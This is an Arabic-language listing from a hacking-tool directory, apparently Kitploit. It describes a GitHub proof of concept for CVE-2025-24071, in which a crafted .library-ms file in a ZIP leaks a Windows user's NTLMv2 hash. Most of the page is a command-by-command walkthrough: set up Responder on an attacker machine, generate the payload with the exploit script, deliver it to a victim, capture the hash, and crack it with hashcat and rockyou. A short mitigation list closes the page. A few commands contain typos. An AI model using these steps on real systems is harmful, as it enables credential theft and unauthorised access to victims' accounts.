Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-24071-POC-NTLMHashDisclosure- — CVE-2025-24071: كشف هاش NTLMv2 عبر ملف .library-ms | Kitploit
أدوات/GitHubGitHub/deshanfer94/cve-2025-24071-poc-ntlmhashdisclosure-
كسر كلمات المرورالاستطلاعتحليل الثغرات الأمنيةالاستغلالجمع المعلوماتالفريق الأحمر
GitHubdeshanfer94/cve-2025-24071-poc-ntlmhashdisclosure-

CVE-2025-24071-POC-NTLMHashDisclosure-

CVE-2025-24071: كشف هاش NTLMv2 عبر ملف .library-ms

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

CVE-2025-24071-POC-NTLMHashDisclosure

  • يُشغّل مصادقة SMB تلقائية إلى مشاركة يتحكم بها المهاجم.
  • لا يتطلب أي تفاعل — يستدعي مستكشف Windows مصادقة NTLM هذه تلقائيًا.
  • يؤدي إلى تسريب تجزئة NTLMv2 (كشف معلومات).
  • يؤثر على Windows 10/11 بجميع الإصدارات، وخاصة 11 23H2.

إعداد بيئة المهاجم

sudo apt update && sudo apt install responder -y

شغّل Responder

sudo responder -I eth0

تشغيل سكربت الاستغلال

تثبيت وحدة Python المطلوبة

pip install colorama python3 CVE-2025-24071.py -i <attacker_ip> -n testpayload -o ./output --keep

سيؤدي هذا إلى إنشاء: testpayload.library-ms testpayload.zip

الاختبار على جهاز الضحية

انقل testpayload.zip إلى جهاز اختبار Windows 11. استخرج ملف ZIP باستخدام مستكشف Windows. يؤدي هذا إلى جعل Windows يحاول الوصول إلى مسار SMB، مما يؤدي إلى تسريب تجزئة NTLM.

التقاط التجزئة

responder -I etho0

صورة

تجهيز ملف التجزئة

أنشئ ملف hash,txt

victim::DOMAIN:1122334455667788:11223344556677889900aabbccddeeff:01010000000000000090d5d00f3

اختيار قائمة الكلمات

الأكثر شيوعًا rockyou.txt

تشغيل Hashcat

hashcat -m 5600 -a 0 -o cracked.txt hash.txt /usr/share/wordlists/rockyou.txt

صورة

التخفيف

  • احظر اتصالات SMB الصادرة (TCP 445) في جدران الحماية.
  • عطّل المصادقة التلقائية لمشاركات SMB غير الموثوقة (نهج المجموعة).
  • راقب استخراج ملفات .library-ms واتصالات SMB.
تنزيل الأداة